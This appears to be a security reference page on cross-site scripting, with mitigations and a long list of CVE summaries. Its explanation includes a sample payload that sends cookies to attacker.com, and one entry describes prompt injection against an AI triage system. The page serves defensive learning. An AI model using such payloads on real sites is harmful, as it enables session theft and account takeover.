Cross-Site Scripting
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.
How It Works
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding. The attacker crafts input containing JavaScript code, which the application then incorporates into its HTML response. When a victim's browser renders this response, it executes the injected script as if it were legitimate code from the trusted website.
The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.
A typical attack flow starts with the attacker identifying an injection point—anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims access the page, their browsers execute this script within the security context of the legitimate domain, giving the attacker full access to cookies, session tokens, and DOM content.
Impact
- Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
- Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
- Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
- Keylogging: Monitor and exfiltrate everything users type on the compromised page
- Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
- Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests
Real-World Examples
A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.
eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.
British Airways faced a sophisticated supply chain attack (2018) where attackers injected JavaScript into the airline's payment page. The script skimmed credit card details from 380,000 transactions, demonstrating how XSS enables payment fraud at massive scale.
Mitigation
- Context-aware output encoding: HTML-encode for HTML context, JavaScript-encode for JS strings, URL-encode for URLs—never use generic escaping
- Content Security Policy (CSP): Deploy strict CSP headers to whitelist script sources and block inline JavaScript execution
- HTTPOnly and Secure cookie flags: Prevent JavaScript access to session cookies and ensure transmission over HTTPS only
- Input validation: Reject unexpected characters and patterns, though this is defense-in-depth, not primary protection
- DOM-based XSS prevention: Use safe APIs like
textContentinstead ofinnerHTML; avoid passing user data to dangerous sinks likeeval()
Recent CVEs (38830)
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Contact List plugin for WordPress (versions up to 3.0.18) where the '_cl_map_iframe' parameter fails to properly sanitize and escape Google Maps iframe custom fields, allowing authenticated attackers with Contributor-level access or higher to inject arbitrary JavaScript that executes in the browsers of users viewing affected pages. The vulnerability stems from insufficient input validation in the saveCustomFields() function and missing output escaping in the front-end rendering, creating a persistent XSS condition with a CVSS score of 6.4 and low-to-moderate exploitation probability given the authentication requirement.
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Autoptimize WordPress plugin through version 3.1.14, caused by insufficient input sanitization in the ao_metabox_save() function and missing output escaping when rendering the 'ao_post_preload' meta value into HTML link tags. Authenticated attackers with Contributor-level access or higher can inject arbitrary JavaScript that executes whenever users access pages with the Image optimization or Lazy-load images settings enabled, potentially affecting all users of compromised sites. The vulnerability has been patched and proof-of-concept code is available in the referenced GitHub commit.
The iTracker360 WordPress plugin (versions up to 2.2.0) contains a combined Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS) vulnerability in its settings form submission handler. An unauthenticated attacker can craft a malicious link or webpage that, when clicked by an administrator, injects arbitrary JavaScript code into the plugin's stored settings due to missing nonce verification and insufficient input sanitization/output escaping. This vulnerability is classified as medium severity (CVSS 6.1) and poses a real risk to WordPress sites using this plugin, as exploitation requires only user interaction and network access with no special privileges.
This is a Stored Cross-Site Scripting (XSS) vulnerability in the Scoreboard for HTML5 Games Lite WordPress plugin affecting all versions up to and including 1.2. The vulnerability exists in the sfhg_shortcode() function, which insufficiently validates HTML attributes added to iframe elements, allowing authenticated attackers with Contributor-level access or above to inject arbitrary JavaScript that executes when users view affected pages. The vulnerability has a CVSS score of 6.4 with medium real-world risk, as it requires authenticated access but affects stored content with site-wide impact.
The Keep Backup Daily WordPress plugin versions up to 2.1.2 contain a Stored Cross-Site Scripting (XSS) vulnerability in the backup title alias functionality due to insufficient input sanitization and output escaping. Authenticated administrators can inject arbitrary JavaScript via the `val` parameter in the `update_kbd_bkup_alias` AJAX action, which executes when other administrators view the backup list page. With a CVSS score of 4.4 and moderate real-world risk due to high privilege requirements, this vulnerability requires administrator-level access to exploit but can compromise other administrator sessions.
The Injection Guard plugin for WordPress versions up to 1.2.9 contains a stored cross-site scripting (XSS) vulnerability that allows unauthenticated attackers to inject malicious JavaScript into the admin log interface. The flaw stems from insufficient sanitization of query parameter names, which are logged and later rendered without proper output escaping when administrators view the plugin's log page. This enables arbitrary script execution in the context of an authenticated administrator's browser session, potentially leading to account compromise or further malicious actions.
A stored cross-site scripting (XSS) vulnerability exists in Discourse's solved posts stream feature where unsanitized topic titles can be persisted and executed in the browser context of authenticated users. The vulnerability affects Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, allowing authenticated attackers to inject malicious JavaScript that executes in the browsers of other users viewing the affected topics. While the CVSS score of 5.4 reflects moderate severity with low impact scope and no availability impact, the attack requires user interaction indirectly through viewing a crafted topic title, making real-world exploitation limited to scenarios where attackers have post creation privileges.
ArcSearch for Android versions prior to 1.12.7 contains an address bar spoofing vulnerability that allows attackers to display a different domain in the browser's address bar than the actual content being rendered. Users of ArcSearch for Android prior to version 1.12.7 are affected, and an attacker can craft malicious web content that, after user interaction, deceives users into believing they are visiting a legitimate domain while viewing attacker-controlled content. There is no indication of active exploitation in KEV data, and EPSS data is not provided.
A stored cross-site scripting (XSS) vulnerability exists in AVideo's comment markdown processing, where the fix for a prior XSS issue (CVE-2026-27568) inadvertently disabled Parsedown's safe mode while implementing incomplete custom sanitization. An attacker with comment posting privileges can inject malicious JavaScript via markdown link syntax (e.g., `[text](javascript:alert(1))`) that executes in the browser context of any user viewing the comment, enabling session hijacking and account takeover. A working proof-of-concept exists and the vulnerability affects all versions of WWBN AVideo using the vulnerable ParsedownSafeWithLinks class (pkg:composer/wwbn_avideo).
AVideo contains a reflected cross-site scripting (XSS) vulnerability in the password unlock functionality where the unlockPassword request parameter is directly reflected into HTML input tag attributes without output encoding. The vulnerability affects AVideo (pkg:composer/wwbn_avideo) and can be exploited by any unauthenticated attacker to execute arbitrary JavaScript in the victim's browser with no user interaction beyond clicking a crafted link, potentially leading to session hijacking, account takeover, or credential theft. A proof-of-concept has been published and the vulnerability is documented in the official GitHub advisory.
A Stored Cross-Site Scripting (XSS) vulnerability exists in atjiu pybbs 6.0.0 within the CommentApiController.java file's create function, allowing authenticated attackers to inject malicious scripts that execute in the browsers of other users viewing comments. The vulnerability requires user interaction (UI:R per CVSS vector) but carries a low CVSS score of 3.5 due to low impact scope; however, a public proof-of-concept exploit is available and the vulnerability has been disclosed, increasing real-world exploitation risk despite the low severity rating.
A stored cross-site scripting (XSS) vulnerability exists in atjiu pybbs 6.0.0 within the TopicApiController.java create function that allows authenticated attackers to inject malicious scripts into topic creation requests. The vulnerability affects all versions of the pybbs application matching the CPE cpe:2.3:a:atjiu:pybbs:*:*:*:*:*:*:*:*, and while the CVSS score of 3.5 is low, a publicly available proof-of-concept exploit has been disclosed, indicating active research and potential real-world exploitation risk.
A reflected cross-site scripting (XSS) vulnerability exists in XinLiangCoder's php_api_doc application through commit 1ce5bbf, specifically in the list_method.php file where the 'f' GET parameter is output directly to the page without sanitization. Remote attackers can inject arbitrary JavaScript code by crafting malicious URLs, enabling session hijacking, credential theft, and malware distribution within the application context. No CVSS score, EPSS data, or KEV status are currently available, but the vulnerability is confirmed with a proof-of-concept reference available via VulnCheck advisory.
A Stored Cross-Site Scripting (XSS) vulnerability exists in the orpc OpenAPI documentation generation functionality, affecting the @orpc/openapi npm package. Attackers who can control OpenAPI specification fields (such as info.description) can inject malicious JavaScript that executes when users view the generated API documentation. A working proof-of-concept exists demonstrating payload injection through specification metadata fields, and while CVSS scores this at 8.2 (High), the network-accessible attack vector with no privileges required increases real-world risk.
A cross-site scripting (XSS) vulnerability exists in QuFTP Service that allows authenticated remote attackers with administrator credentials to bypass security mechanisms and read application data. The vulnerability affects multiple versions of QuFTP Service across different release branches (1.4.x, 1.5.x, and 1.6.x prior to specified patch versions). While no CVSS score, EPSS probability, or KEV status is currently available, the requirement for administrator-level access significantly constrains real-world exploitation risk.
A second-order XSS vulnerability exists in Textpattern CMS version 4.9.0 where user-supplied input (such as category parameters) is improperly sanitized and lacks contextual XML escaping in Atom feed XML elements like <id> and <link href>. While the payload does not execute directly in raw XML contexts within modern browsers, it becomes exploitable when feed readers, admin dashboards, or CMS aggregators consume the feed and insert its content into the DOM using unsafe methods like innerHTML, resulting in arbitrary JavaScript execution in a trusted context. A public proof-of-concept exploit is available, making this an active threat to administrators and users consuming feeds from vulnerable Textpattern instances.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the error_description parameter of Gainsight Assist, allowing unauthenticated attackers to inject malicious JavaScript payloads that execute in victims' browsers. The vulnerability is particularly dangerous because attackers can bypass the application's Web Application Firewall (WAF) using Safari-specific event handlers such as onpagereveal, which are not typically filtered by standard XSS protections. While the CVSS score of 6.1 indicates moderate severity with limited direct impact (integrity and availability degradation rather than confidentiality breach), the attack requires minimal technical complexity and no special privileges, making it exploitable by any attacker who can craft a malicious URL and socially engineer a victim into clicking it.
WeGIA, a web manager for charitable institutions, contains a Reflected Cross-Site Scripting (XSS) vulnerability in the listar_memorandos_ativos.php endpoint affecting versions 3.6.6 and below. An attacker can inject arbitrary JavaScript or HTML into the sccd GET parameter, which is reflected without sanitization when the msg parameter equals 'success', enabling session hijacking, credential theft, and malicious actions in the context of victim users. The vulnerability has a critical CVSS score of 9.3 with changed scope, indicating potential impact beyond the vulnerable component.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in WeGIA, a web manager for charitable institutions. Versions 3.6.6 and below are affected through the novo_memorandoo.php endpoint, where an attacker can inject arbitrary JavaScript via the sccs GET parameter without sanitization. This allows execution of malicious scripts in victims' browsers when they click a crafted link, with a critical CVSS score of 9.3 due to cross-site scripting scope and high confidentiality and integrity impact.
Frigate versions prior to 0.17.0-beta1 contain an authentication weakness that allows any authenticated user to change another user's password without verifying the current password via the /users/{username}/password endpoint, combined with a failure to invalidate existing JWT tokens upon password change and absence of password strength validation. An attacker who obtains a valid session token through XSS, accidental exposure, cookie theft, compromised device, or unencrypted HTTP sniffing can permanently hijack victim accounts by changing their password while maintaining session access through non-invalidated tokens. This vulnerability has not been reported as actively exploited in the wild (KEV status unknown), but the straightforward nature of the attack and the common exposure vectors for JWT tokens make this a practical threat requiring immediate patching.
Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Vasilis Triantafyllou Special Box for Content allows DOM-Based XSS. Rated medium severity (CVSS 5.9), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.
CM Custom Reports - Flexible reporting to track what matters most plugin for WordPress contains a Stored Cross-Site Scripting (XSS) vulnerability in admin settings that allows authenticated administrators to inject arbitrary web scripts. The vulnerability affects all versions up to and including 1.2.7 and is caused by insufficient input sanitization and output escaping in the GraphModule.php file. While the CVSS score of 4.4 is moderate, exploitation is restricted to high-privilege authenticated attackers on multi-site WordPress installations or where unfiltered_html has been disabled, making real-world exploitability dependent on specific WordPress configurations.
Jexactyl, a game management panel and billing system, contains a stored DOM-based cross-site scripting (XSS) vulnerability in its template rendering engine where server-side objects are injected into client-side JavaScript without proper escaping. The vulnerability affects versions after commit 025e8dbb0daaa04054276bda814d922cf4af58da and before the patched commit e28edb204e80efab628d1241198ea4f079779cfd, allowing authenticated attackers with high privileges to inject malicious payloads through attacker-controlled fields such as usernames or display names that execute arbitrary JavaScript in the browsers of all users viewing the affected page. The CVSS score of 5.8 reflects local attack vector requirements and high privilege prerequisites, though the stored nature of the XSS and lack of user interaction requirements for viewing the malicious content represent meaningful security risk for multi-user deployments.
A stored cross-site scripting (XSS) vulnerability exists in itsourcecode University Management System version 1.0 within the /admin_single_student_update.php file, where the st_name parameter fails to properly sanitize user input. An authenticated administrator with high privileges can inject malicious scripts that execute in the context of other users' browsers, potentially leading to session hijacking, credential theft, or unauthorized administrative actions. A proof-of-concept exploit has been publicly disclosed on GitHub, increasing real-world exploitation risk despite the low CVSS score of 2.4.
SiYuan personal knowledge management system contains a cross-site scripting (XSS) vulnerability in versions 3.6.0 and below. An unauthenticated attacker can exploit the /api/icon/getDynamicIcon endpoint by crafting a malicious URL that bypasses SVG sanitization filters, allowing arbitrary JavaScript execution when a victim clicks an injected link within the rendered SVG. The CVSS score of 9.3 indicates critical severity, though exploitation requires user interaction (clicking a malicious link) and the attack complexity is low.
A stored cross-site scripting (XSS) vulnerability in Anchorr Discord bot versions 1.4.1 and below allows authenticated Jellyseerr users to execute arbitrary JavaScript in admin browser sessions. The XSS payload can exfiltrate the full application configuration including session tokens and API keys for integrated services (Jellyfin, Jellyseerr, Discord), enabling complete account takeover across all connected platforms without requiring admin credentials. This vulnerability is tagged as XSS in ENISA's database (EUVD-2026-13503) with a CVSS score of 9.0, though no EPSS score, KEV listing, or public POC availability is reported in the provided data.
A stored Cross-site Scripting (XSS) vulnerability exists in the Anchorr Discord bot's web dashboard User Mapping dropdown that allows any unprivileged Discord user in the configured guild to execute arbitrary JavaScript in an administrator's browser. This can be chained with an unauthenticated API endpoint (/api/config) to exfiltrate all stored credentials including Discord tokens, Jellyfin API keys, Jellyseerr API keys, JWT secrets, webhook secrets, and bcrypt password hashes. The vulnerability affects Anchorr versions 1.4.1 and below, with a critical CVSS score of 9.6 indicating network-based exploitation with low complexity and no authentication required.
ChurchCRM versions prior to 7.0.2 contain a stored cross-site scripting (XSS) vulnerability in the system settings module where administrative users can inject unescaped JavaScript payloads into JSON-type system settings fields. Any administrator who subsequently views the system settings page will execute the attacker's malicious script, potentially allowing credential theft, session hijacking, or lateral movement within the church organization's administrative infrastructure. The vulnerability has been patched in version 7.0.2, and no evidence of active exploitation in the wild has been reported, though the attack requires only high-level privileges (admin access) and basic user interaction (viewing settings).
DooTask v1.6.27 contains a Stored or Reflected Cross-Site Scripting (XSS) vulnerability in the /manage/project/<id> endpoint via the projectDesc input field, allowing an attacker to inject malicious JavaScript that executes in the context of other users' browsers. An authenticated or unauthenticated attacker can exploit this to steal session cookies, perform actions on behalf of victims, or redirect users to malicious sites. A proof-of-concept has been publicly disclosed on GitHub, increasing the likelihood of active exploitation.
A stored cross-site scripting (XSS) vulnerability exists in Zimbra Collaboration Server (ZCS) versions 10.0 and 10.1 within the Briefcase feature, caused by insufficient sanitization of uploaded file types. When an attacker crafts a malicious file and shares it via the Briefcase public sharing mechanism, the embedded JavaScript executes in the victim's browser session context when the file is opened, enabling arbitrary script execution, session hijacking, credential theft, and unauthorized actions on behalf of the victim. No CVSS score, EPSS data, or active KEV status is currently available, though the attack vector is network-based with low complexity and requires user interaction (file opening).
SyncFusion versions up to 30.1.37 contain stored Cross-Site Scripting (XSS) vulnerabilities in two distinct UI components: the Document-Editor reply-to-comment field and the Chat-UI chat message field. An attacker can inject malicious JavaScript payloads through these fields, which are then stored and executed in the browsers of other users who view the affected content, potentially enabling session hijacking, credential theft, or malware distribution. No CVSS score, EPSS data, or KEV status is currently available, but proof-of-concept exploitation details are documented in the pentest-tools reference (PTT-2025-023-Multiple-Stored-XSS.pdf).
A reflected cross-site scripting (XSS) vulnerability exists in the Zimbra Collaboration Suite (ZCS) Classic Webmail REST interface (/h/rest) affecting versions 10.0 and 10.1, allowing unauthenticated attackers to inject malicious JavaScript via crafted URLs. When a victim accesses the malicious link, the injected script executes within the Zimbra webmail application context, enabling the attacker to perform unauthorized actions on behalf of the victim such as reading emails, modifying settings, or sending messages. No CVSS score, EPSS probability, or public exploit code availability data is currently documented in the available intelligence sources, though the vulnerability is documented in the Zimbra Releases 10.1.16 security fixes, indicating a patch has been made available.
File Thinghie version 2.5.7 contains a Reflected Cross-Site Scripting (XSS) vulnerability in the 'dir' GET parameter that allows attackers to execute arbitrary JavaScript code in users' browsers. An attacker can craft a malicious URL containing JavaScript payload in the 'dir' parameter and trick users into clicking it, resulting in session hijacking, credential theft, or malware distribution. While CVSS and EPSS scores are not available, proof-of-concept code exists in public repositories, indicating the vulnerability is well-documented and likely exploitable.
File Thingie version 2.5.7 contains a Stored Cross-Site Scripting (XSS) vulnerability in its file upload functionality where attackers can craft malicious filenames to execute arbitrary JavaScript in users' browsers. An attacker with the ability to upload files to a File Thingie instance can inject JavaScript payloads via filename manipulation, affecting any user who views the uploaded file list or file details. While no CVSS score, EPSS probability, or KEV inclusion status is currently available, proof-of-concept code has been published on GitHub, indicating the vulnerability is publicly disclosed and likely exploitable.
SuiteCRM versions prior to 7.15.1 and 8.9.3 contain a stored cross-site scripting (XSS) vulnerability in the return_id request parameter, which is insufficiently sanitized before being reflected into HTML event handler attributes. An authenticated attacker with high privileges can craft malicious payloads that execute arbitrary JavaScript in the context of other users' browsers, potentially leading to session hijacking, credential theft, or unauthorized actions performed on behalf of victims. While this vulnerability requires authenticated access and user interaction to trigger, it affects a widely-deployed open-source CRM platform used by many enterprises.
A reflected HTML injection vulnerability exists in the login page of SuiteCRM 7.15.0, allowing attackers to inject arbitrary HTML content that can be used for phishing attacks and page defacement. The vulnerability requires user interaction (clicking a malicious link) but needs no authentication, affecting this specific version of the open-source CRM platform. While no active exploitation has been reported in KEV and no public POC is mentioned, the vulnerability presents a moderate risk for targeted phishing campaigns.
A stored cross-site scripting (XSS) vulnerability exists in the OpenWrt LuCI web interface where malicious JavaScript code embedded in Wi-Fi network names (SSIDs) can execute when users open the wireless scan modal. The vulnerability affects OpenWrt versions newer than 23.05/22.03 up to 24.10.5 and 25.12.0, allowing attackers within wireless range to compromise users who scan for available networks. No active exploitation has been reported (not in KEV), and with an EPSS score not provided, the real-world exploitation risk appears limited despite the high CVSS score of 8.6.
Authenticated users can inject persistent JavaScript through malicious DOT graph definitions in the discourse-graphviz plugin on Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, enabling stored XSS attacks when Content Security Policy is disabled. Affected instances should upgrade to patched versions, disable the plugin, or enforce a CSP as a temporary mitigation, as no patch is currently available for all deployment scenarios.
OpenClaw prior to version 2026.2.23 allows local authenticated attackers to inject malicious code into exported HTML sessions through specially crafted mimeType values in image content blocks. When a user opens the exported HTML file, the injected code executes arbitrary JavaScript in their browser context. Exploitation requires local access and user interaction to open the malicious HTML file.
A stored cross-site scripting (XSS) vulnerability exists in FreeScout help desk software versions 1.8.208 and below, where malicious email content is stored unsanitized and executed when email notifications are sent to agents. An unauthenticated attacker can exploit this by simply sending a specially crafted email that executes malicious scripts when viewed by support staff in their email clients, potentially leading to session hijacking, credential theft, and account takeover. The vulnerability has a critical CVSS score of 9.3 due to its ease of exploitation and broad impact across all notification recipients.
Stored XSS in FreeScout 1.8.208 and earlier allows authenticated attackers to execute arbitrary JavaScript in victims' browsers by uploading a malicious SVG file with a .png extension and image/svg+xml content type, bypassing both the attachment view logic and SVG sanitizer. The vulnerability exploits a fallback mechanism that unsafely processes invalid XML, enabling script execution when the file is rendered inline. An attacker with upload permissions can compromise other users' sessions and data through this cross-site scripting attack.
Cross-site scripting in Discourse's Review Queue interface allows remote attackers to inject malicious payloads through prompt injection attacks against the AI triage system, which renders unsanitized LLM output to staff members. When administrators or moderators view flagged posts, the injected payload executes in their browser context, potentially compromising their sessions or performing unauthorized actions. The vulnerability affects Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, with patches available in these releases.
Reflected cross-site scripting in Discourse AI conversation sharing allows unauthenticated attackers to inject malicious scripts through improperly sanitized conversation titles in the onebox rendering feature. An attacker can craft a malicious shared conversation link to execute arbitrary JavaScript in the context of other users' browsers, potentially stealing session tokens or performing unauthorized actions. The vulnerability affects versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, and currently has no patch available as a preventive measure.
A stored cross-site scripting vulnerability in OpenEMR's patient portal payment flow allows authenticated patient users to inject malicious JavaScript that executes when staff members review payment submissions. The vulnerability affects OpenEMR versions prior to 8.0.0.2 and enables attackers to compromise staff accounts, potentially accessing sensitive medical records and administrative functions. No evidence of active exploitation exists, and no KEV listing or public POC has been identified.
Insufficient sanitization of Codepen iframe parameters in Discourse prior to versions 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 allows authenticated attackers to manipulate users into changing the main page URL through social engineering. The vulnerability requires user interaction and network access but has no available patch, making disabling Codepen embeds the recommended mitigation.
Stored XSS in OpenEMR versions before 8.0.0.2 allows authenticated patient portal users to inject malicious scripts into their login username, which execute in the browsers of clinic staff when viewing the portal credential creation page. This vulnerability enables attackers to compromise staff and admin sessions through the patient context, potentially leading to unauthorized access or data manipulation within the healthcare system. A patch is available in version 8.0.0.2 and later.
Stored XSS in OpenEMR prior to 8.0.0.2 allows authenticated users with the "Notes - my encounters" role to inject malicious JavaScript into Eye Exam form fields, which executes when other users with the same role view the form responses. An attacker can exploit this to steal session tokens, perform unauthorized actions, or compromise patient data through form manipulation. No patch is currently available for affected versions.
DOM-based stored XSS in OpenEMR's SearchHighlight plugin (versions prior to 8.0.0.2) enables authenticated users with encounter form write access to inject malicious JavaScript that executes in other clinicians' browsers during report searches. An attacker can leverage this to steal session tokens, modify patient data, or perform actions on behalf of targeted medical staff. The vulnerability stems from improper handling of HTML entity decoding when parsing search results.
Query Monitor, a WordPress debugging plugin, contains a Reflected Cross-Site Scripting (XSS) vulnerability in versions up to 3.20.3 where user-controlled data from REQUEST_URI is insufficiently escaped before rendering in the admin interface. Unauthenticated attackers can craft malicious links that, when clicked by Administrator users, execute arbitrary JavaScript in their browser context. The vulnerability has a CVSS score of 6.1 (Medium) and requires user interaction, but represents a direct attack vector against high-privilege WordPress administrators.
Mozilla's Embed extension contains a domain allowlist bypass in the DomainFilteringAdapter due to insufficient hostname boundary validation in its regex pattern, allowing attacker-controlled domains like youtube.com.evil to pass validation checks for youtube.com. This vulnerability enables Server-Side Request Forgery attacks via the OscaroteroEmbedAdapter to probe internal services, and Cross-Site Scripting attacks through unsanitized oEmbed HTML responses returned by compromised domains. No patch is currently available for this medium-severity flaw.
DiceBear avatar generation libraries (@dicebear/core and @dicebear/initials) are vulnerable to stored XSS through unescaped SVG attributes when user-supplied options like backgroundColor, fontFamily, and textColor are directly interpolated into SVG output. Attackers can inject malicious JavaScript that executes when the resulting SVG is rendered inline or served with SVG content-type, affecting any application that passes untrusted input to the createAvatar() function. No patch is currently available.
Stored cross-site scripting in the WWBN/AVideo CDN plugin allows authenticated attackers to inject malicious JavaScript through improperly sanitized video titles, which executes when users access download pages. An attacker with video creation or modification privileges can compromise any user viewing the affected download interface. No patch is currently available for PHP and Python implementations.
This vulnerability is a stored/reflected cross-site scripting (XSS) flaw in OPEXUS eComplaint and eCASE that allows authenticated attackers to inject malicious JavaScript into the 'Name of Organization' field during case creation. When a victim views the affected case information page, the unvalidated payload executes in their browser session, potentially leading to session hijacking, credential theft, or unauthorized actions. With a CVSS score of 5.5 (medium severity) requiring low attack complexity and user interaction, this represents a meaningful risk to authenticated users, though the requirement for prior authentication and user interaction limits its immediate exploitability.
This is a stored cross-site scripting (XSS) vulnerability in OPEXUS eComplaint and eCASE platforms where the first and last name fields in the 'My Information' screen fail to properly sanitize user input. An authenticated attacker can inject malicious JavaScript code into these fields, which executes in the context of victim sessions when the full name is rendered, allowing credential theft, session hijacking, or malicious actions on behalf of the victim. The CVSS 5.5 score reflects moderate risk (low integrity/confidentiality/availability impact) mitigated by authentication requirements and user interaction necessity, though the practical risk depends on deployment context and whether patches are available.
This is a stored cross-site scripting (XSS) vulnerability in OPEXUS eComplaint and eCASE versions before 10.2.0.0, where user profile first and last name fields lack proper input sanitization. An authenticated attacker can inject malicious JavaScript payloads into these fields, which execute in the context of any victim's session when the attacker's full name is rendered, allowing theft of session tokens, credential harvesting, or account manipulation. The vulnerability carries a CVSS 5.5 (medium) score but poses real risk due to its authenticated-but-no-special-privileges requirement and user interaction dependency; exploitation is likely straightforward given the simplicity of XSS injection techniques.
Linkit ONE Location Aware Sensor System (LASS) up to commit f06bd20 contains reflected cross-site scripting (XSS) in PM25.php that permits remote attackers to execute arbitrary JavaScript in victim browsers through unencoded GET parameters (site, city, district, channel, apikey). The vulnerability affects a sensor data collection platform and carries a low exploitation probability (EPSS 0.21%, percentile 43%), suggesting limited real-world attack activity despite public disclosure through VulnCheck.
A stored cross-site scripting (XSS) vulnerability exists in the Everest Forms Pro WordPress plugin that allows attackers to inject malicious scripts into web pages. The plugin versions through 1.9.10 are affected, and the vulnerability can be exploited over the network with low attack complexity requiring no privileges but user interaction. With a CVSS score of 7.1 and reported by Patchstack audit team, this represents a moderate-to-high severity issue with scope change indicating potential impact beyond the vulnerable component.
A reflected cross-site scripting (XSS) vulnerability exists in the Website LLMs.Txt WordPress plugin through version 8.2.6, allowing remote attackers to inject malicious scripts into web pages viewed by users. The vulnerability requires user interaction (UI:R) but no authentication (PR:N) and can be exploited over the network with low complexity (AC:L). With a CVSS score of 7.1 and changed scope (S:C), this represents a medium-to-high severity issue that could lead to session hijacking, credential theft, or malicious actions performed in the context of victim users.
A reflected cross-site scripting (XSS) vulnerability exists in the QantumThemes Kentha WordPress theme that allows attackers to inject malicious scripts into web pages. The vulnerability affects all versions of Kentha through 4.7.2 and can be exploited remotely without authentication, though it requires user interaction. With a CVSS score of 7.1, this represents a high-severity issue, though no KEV listing or EPSS data suggests active widespread exploitation at this time.
A reflected cross-site scripting (XSS) vulnerability exists in the ThemeHunk Gutenberg Blocks plugin for WordPress (also known as Unlimited Blocks for Gutenberg), affecting versions up to and including 1.2.8. An attacker can exploit this vulnerability by crafting malicious URLs that execute arbitrary JavaScript in victims' browsers when clicked, potentially leading to session hijacking, credential theft, or malicious actions performed on behalf of authenticated users. The vulnerability was reported by Patchstack's audit team and carries a CVSS score of 7.1, indicating high severity with cross-site scope impact.
A reflected cross-site scripting (XSS) vulnerability exists in the Table of Contents Creator WordPress plugin that allows attackers to inject malicious scripts into web pages. The vulnerability affects all versions through 1.6.4.1 and can be exploited remotely without authentication, though it requires user interaction. With a CVSS score of 7.1 and a changed scope, this represents a moderate severity issue reported by Patchstack's audit team.
The tagDiv Opt-In Builder WordPress plugin versions up to and including 1.7.3 contains a reflected cross-site scripting (XSS) vulnerability due to improper neutralization of user input during web page generation. An attacker can exploit this by tricking a user into clicking a malicious link, allowing the execution of arbitrary JavaScript in the victim's browser within the context of the vulnerable site. This vulnerability has a CVSS score of 7.1 with network-based attack vector and low attack complexity, though no active exploitation (KEV) or public proof-of-concept has been documented at this time.
tagDiv Composer, a WordPress plugin used by tagDiv themes, contains a reflected cross-site scripting (XSS) vulnerability that allows unauthenticated attackers to inject malicious scripts into web pages. Versions up to and including 5.4.2 are affected. The vulnerability requires user interaction (victim must click a malicious link) but can be exploited remotely without authentication, making it a moderate-severity threat with a CVSS score of 7.1.
HCL Connections contains a reflected or stored cross-site scripting (XSS) vulnerability that allows authenticated attackers to inject malicious JavaScript into the application, which executes in the browsers of other users who interact with the crafted payload. An attacker with valid credentials can steal session cookies and authentication tokens, potentially compromising victim accounts and enabling further attacks such as lateral movement or data exfiltration. The vulnerability requires user interaction and authentication to exploit, resulting in a CVSS score of 5.4 (Medium severity), though the impact is cross-site scope.
A reflected cross-site scripting (XSS) vulnerability exists in the ArtstudioWorks Brookside WordPress theme through version 1.4. An attacker can inject malicious scripts that execute in victims' browsers when they click a specially crafted link, potentially leading to session hijacking, credential theft, or defacement. The CVSS score of 7.1 indicates high severity with a changed scope, and this vulnerability was disclosed by Patchstack as a database entry.
A DOM-based cross-site scripting (XSS) vulnerability exists in WPSight WPCasa WordPress plugin versions through 1.4.1, allowing authenticated attackers to inject malicious JavaScript that executes in users' browsers. The vulnerability stems from improper neutralization of user input during web page generation, enabling an attacker with login credentials to craft malicious payloads that execute in the context of other users' sessions. With a CVSS score of 6.5 and network-accessible attack vector requiring only user interaction, this vulnerability poses a moderate risk to WordPress installations using affected WPCasa versions, particularly those managing real estate listings where authenticated users have content creation privileges.
A Stored cross-site scripting (XSS) vulnerability affects HCL Unica Marketing Operations v12.1.8 and lower. Rated high severity (CVSS 7.6), this vulnerability is remotely exploitable. No vendor patch available.
The Simple Draft List WordPress plugin for Dartiss contains a Stored Cross-Site Scripting vulnerability in versions up to 2.6.2, caused by insufficient input sanitization and output escaping of the 'display_name' post meta field. Authenticated attackers with Contributor-level access or higher can inject arbitrary JavaScript via the {{author+link}} template tag when no author URL is present, which will execute whenever users visit pages containing the [drafts] shortcode. The vulnerability has a CVSS score of 6.4 with a network attack vector and low attack complexity, requiring only low-level privileges.
The Info Cards - Add Text and Media in Card Layouts WordPress plugin versions up to 2.0.7 contains a Stored Cross-Site Scripting vulnerability in the 'btnUrl' parameter of the Info Cards block that allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript code. The vulnerability exists because the plugin fails to validate URL protocols (specifically javascript: schemes) on the server side, and the client-side rendering directly inserts unsanitized URLs into anchor href attributes, enabling script execution when users click the malicious button links. While there is no indication of active KEV exploitation, the low attack complexity and low privilege requirements make this a practical threat in multi-author WordPress environments.
